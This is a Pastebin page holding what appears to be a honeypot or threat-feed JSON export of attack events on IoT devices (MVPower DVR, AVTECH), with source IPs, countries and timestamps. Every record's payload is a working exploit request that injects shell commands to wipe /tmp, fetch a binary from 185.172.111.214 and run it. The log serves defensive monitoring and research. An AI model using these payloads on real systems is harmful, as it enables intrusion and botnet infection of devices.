Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "count": 484,
- "next": null,
- "previous": null,
- "results": [
- {
- "event_id": "e8412ee87acd3645938b12cc8f93cea0e3f4e180563b1d7598eaf3691ab550ec",
- "source_ip_address": "189.225.157.16",
- "country": "MX",
- "user_agent": "Hello, World",
- "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-17T01:18:25Z",
- "last_seen": "2020-06-17T07:57:16Z"
- },
- {
- "event_id": "fc8d87f3252fe585bcf2c693acfe988de9385acbb9579c687478bf68ebe1890b",
- "source_ip_address": "202.160.39.194",
- "country": "BN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-06T02:38:29Z",
- "last_seen": "2020-06-17T04:18:23Z"
- },
- {
- "event_id": "208e11fa6f6597b589920439f1da12ae8d93a0067119419f9ff3c929bfccf199",
- "source_ip_address": "68.150.109.112",
- "country": "CA",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-14T16:18:54Z",
- "last_seen": "2020-06-16T18:56:49Z"
- },
- {
- "event_id": "d9d60a3f37ce8e0151bdaddf284ea1f168f8abdaf9fcb2eec5391b32b0503f49",
- "source_ip_address": "14.207.113.218",
- "country": "TH",
- "user_agent": "Hello, World",
- "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-16T15:38:14Z",
- "last_seen": "2020-06-16T15:38:14Z"
- },
- {
- "event_id": "e40a253f029fc8e65fd7169e0a6b4b52a3673a7845ba889da12d4b6b9dc0a1a3",
- "source_ip_address": "119.82.97.219",
- "country": "IN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2020-06-05T01:29:15Z",
- "last_seen": "2020-06-16T00:27:27Z"
- },
- {
- "event_id": "656c2549ab797cc42bfd30bb21fdc430185a80c1a2e7edda9d908bcc1d21e44f",
- "source_ip_address": "58.69.58.87",
- "country": "PH",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-06T05:20:24Z",
- "last_seen": "2020-06-15T19:44:47Z"
- },
- {
- "event_id": "a757fdcfa6d4191a558836a4c252b2fed6e7189f65c4101ff1bc63bedd367be7",
- "source_ip_address": "116.108.218.74",
- "country": "VN",
- "user_agent": "Hello, World",
- "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-15T10:40:17Z",
- "last_seen": "2020-06-15T10:40:17Z"
- },
- {
- "event_id": "24c81fdd645833bd4c8be5dbb8a69b6e01a1e4bab9166facf5fe0a9e1f038773",
- "source_ip_address": "116.87.119.73",
- "country": "SG",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-11T09:45:33Z",
- "last_seen": "2020-06-13T23:21:42Z"
- },
- {
- "event_id": "2e7cd3e10229f5932a7c63a9bf88769c700b37420c0d78ef4b238961eb2a7a80",
- "source_ip_address": "200.39.231.55",
- "country": "MX",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-04T22:11:28Z",
- "last_seen": "2020-06-13T12:47:13Z"
- },
- {
- "event_id": "198e9f94933adbdf9a2318776ce8c4947641e3d02d21c1f70c85ec99b68c4f4b",
- "source_ip_address": "114.141.54.106",
- "country": "ID",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-02T07:05:27Z",
- "last_seen": "2020-06-13T04:59:52Z"
- },
- {
- "event_id": "ada9949c210f7a040cb67413d29da55c8675e84ad40ebcb3bbeefb37a04c97b7",
- "source_ip_address": "77.235.145.202",
- "country": "LB",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-08T02:08:53Z",
- "last_seen": "2020-06-12T17:30:41Z"
- },
- {
- "event_id": "c9fc75903d02ad1dbbc076e18411a69bb4b680b906a2d7312922d2945fffe548",
- "source_ip_address": "96.75.231.194",
- "country": "US",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-11T22:09:28Z",
- "last_seen": "2020-06-11T22:09:28Z"
- },
- {
- "event_id": "3f29f297982bcd099ba1a14efd9a873c892e965f2ed1904f608fed0c55b3e077",
- "source_ip_address": "82.255.38.238",
- "country": "FR",
- "user_agent": "Hello, World",
- "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-11T16:53:31Z",
- "last_seen": "2020-06-11T16:53:31Z"
- },
- {
- "event_id": "7bc5d7c1e2e20809fa6dd0f9e2301c94dac9a46c5045ac15433a2800401ab3ff",
- "source_ip_address": "58.182.23.33",
- "country": "SG",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T09:51:25Z",
- "last_seen": "2020-06-11T00:46:56Z"
- },
- {
- "event_id": "2d812c6a9c6cd68bc82bfa7f4068090d0ce31a70ceb2487f589a1bb8b9813930",
- "source_ip_address": "203.210.157.13",
- "country": "VN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-10T05:07:24Z",
- "last_seen": "2020-06-10T05:07:24Z"
- },
- {
- "event_id": "61ccde5876ffd40e422aa34815858747a32f2dde9a85191959f9bc2a8b82f082",
- "source_ip_address": "5.34.149.225",
- "country": "ES",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-03T22:10:35Z",
- "last_seen": "2020-06-09T22:12:42Z"
- },
- {
- "event_id": "eb77cfe6e912c19f63a058ae3e72e2f48028e01c5c502e2f9907c930c5dd88f8",
- "source_ip_address": "185.173.60.5",
- "country": "LB",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-04T17:51:47Z",
- "last_seen": "2020-06-09T21:43:21Z"
- },
- {
- "event_id": "2992e4ba9c8eb55324037ba2cdbe629fc464116d3b90284b7766ec530b4588da",
- "source_ip_address": "160.120.131.129",
- "country": "CI",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-09T19:15:55Z",
- "last_seen": "2020-06-09T19:15:55Z"
- },
- {
- "event_id": "1a7ca8003d5415d867b2c30caeda45c14e991f510f2c5a174ac43808258be4fb",
- "source_ip_address": "101.128.74.27",
- "country": "ID",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-02T06:36:04Z",
- "last_seen": "2020-06-09T15:58:08Z"
- },
- {
- "event_id": "6a4406dd171b23a0931c37c586d0227c2b8b58f4b3115b7e22a0df58ff39fbca",
- "source_ip_address": "110.232.80.209",
- "country": "ID",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-09T13:44:27Z",
- "last_seen": "2020-06-09T13:44:27Z"
- },
- {
- "event_id": "66c9f9a3d74d38230178a5f7e3574f3af0b87fa86918a32176e71dedb4cdacbe",
- "source_ip_address": "41.39.51.193",
- "country": "EG",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-08T23:50:57Z",
- "last_seen": "2020-06-08T23:50:57Z"
- },
- {
- "event_id": "413fe831241d5fff002d9979af144d8ea7fb089fea9917807dfa7d1a1c23c696",
- "source_ip_address": "81.28.86.193",
- "country": "NL",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-08T18:42:19Z",
- "last_seen": "2020-06-08T18:42:19Z"
- },
- {
- "event_id": "99b65fa4e14bded04e37dd98bc18196466178e2e0bbdd4de8dbf9e74f3886d3f",
- "source_ip_address": "24.138.226.129",
- "country": "PR",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-08T11:57:50Z",
- "last_seen": "2020-06-08T11:57:50Z"
- },
- {
- "event_id": "5ea380327aebe8cad8e627ff57bb3bc2260ad12f1842888465d98f23a2181961",
- "source_ip_address": "2.88.134.28",
- "country": "SA",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-07T01:28:35Z",
- "last_seen": "2020-06-08T10:58:22Z"
- },
- {
- "event_id": "48fac1a45c906ea9b167a41c7fe7d8dd53a147cdeae65a14c0918d943069374c",
- "source_ip_address": "41.73.3.190",
- "country": "NG",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-04T03:12:44Z",
- "last_seen": "2020-06-08T06:05:26Z"
- },
- {
- "event_id": "0d4386d6ddbe0a123fc81b29001472a8a4f882c40e2792a8233f245edd90cc73",
- "source_ip_address": "113.160.189.12",
- "country": "VN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-03T08:35:59Z",
- "last_seen": "2020-06-07T00:19:49Z"
- },
- {
- "event_id": "ceefcf98d0a70c61aa0668cd9e8b705331ce32643007d7a1e8ea0e9563812a83",
- "source_ip_address": "71.205.133.151",
- "country": "US",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-02T22:55:55Z",
- "last_seen": "2020-06-06T10:57:13Z"
- },
- {
- "event_id": "107403196ee80c00bc7f393c5a53ec5506dc849b593ed42e6c7ca75034d555ed",
- "source_ip_address": "101.99.33.118",
- "country": "VN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T14:53:19Z",
- "last_seen": "2020-06-05T14:53:19Z"
- },
- {
- "event_id": "3d048095774ac9bbc3f682b3162d858e7d82c9b7d49b6f9b66167287aed37050",
- "source_ip_address": "187.134.220.211",
- "country": "MX",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T06:59:14Z",
- "last_seen": "2020-06-05T06:59:14Z"
- },
- {
- "event_id": "915ca5a00a4ae06ff5e6bf2ad1453b463bc449e7afb519f112c6ddeef1bb73bf",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:51Z",
- "last_seen": "2020-06-05T00:31:51Z"
- },
- {
- "event_id": "d276fb1901e3ef0975eefcbcd04362977e3844cdc2704eb21f954f67a58251e3",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:51Z",
- "last_seen": "2020-06-05T00:31:51Z"
- },
- {
- "event_id": "3d82a6146e1eb4e0d98339fb0bb740c2594c29e6fd92b382224999bf1d627f54",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:49Z",
- "last_seen": "2020-06-05T00:31:49Z"
- },
- {
- "event_id": "cdeefa87f6fa4102219a66444877e08fad8461303a5c6324df692811fc56966a",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:47Z",
- "last_seen": "2020-06-05T00:31:47Z"
- },
- {
- "event_id": "23e190350756e823a1bacefd80ef4628ce0b5630562ab626c733e9ccdf49c645",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:46Z",
- "last_seen": "2020-06-05T00:31:46Z"
- },
- {
- "event_id": "48ec965f424e5a972083a1acebe2045b7e2eef15438a34a59bda430760544b11",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:46Z",
- "last_seen": "2020-06-05T00:31:46Z"
- },
- {
- "event_id": "7697269d43c72270732d3bbf201cfc7a1e96df9032f8c341d3e0fa8294370bb7",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:44Z",
- "last_seen": "2020-06-05T00:31:44Z"
- },
- {
- "event_id": "9b4406704bcbba0a3ff30679ff2a1a50bed736141c93e59d12db96d4fadf2fa8",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:44Z",
- "last_seen": "2020-06-05T00:31:44Z"
- },
- {
- "event_id": "6bb75f7f2832e0f4145d10db25380c25d837340c40a4d957dcf1addfb2e5d4bd",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:13Z",
- "last_seen": "2020-06-05T00:31:13Z"
- },
- {
- "event_id": "5ec0fe3e7e0c7c25cec989a4cbec3b67e8cf352442073abd0a117df1010b89fe",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:11Z",
- "last_seen": "2020-06-05T00:31:11Z"
- },
- {
- "event_id": "2c498b68f7672837d42aa8c552855b5028f089ebcdd5f1505e8334663cd7c29f",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:07Z",
- "last_seen": "2020-06-05T00:31:07Z"
- },
- {
- "event_id": "13da8f5c414488bd6a18dd942cf826246ebf18bb3c6bf295beb559a60bb39cf7",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-05T00:31:06Z",
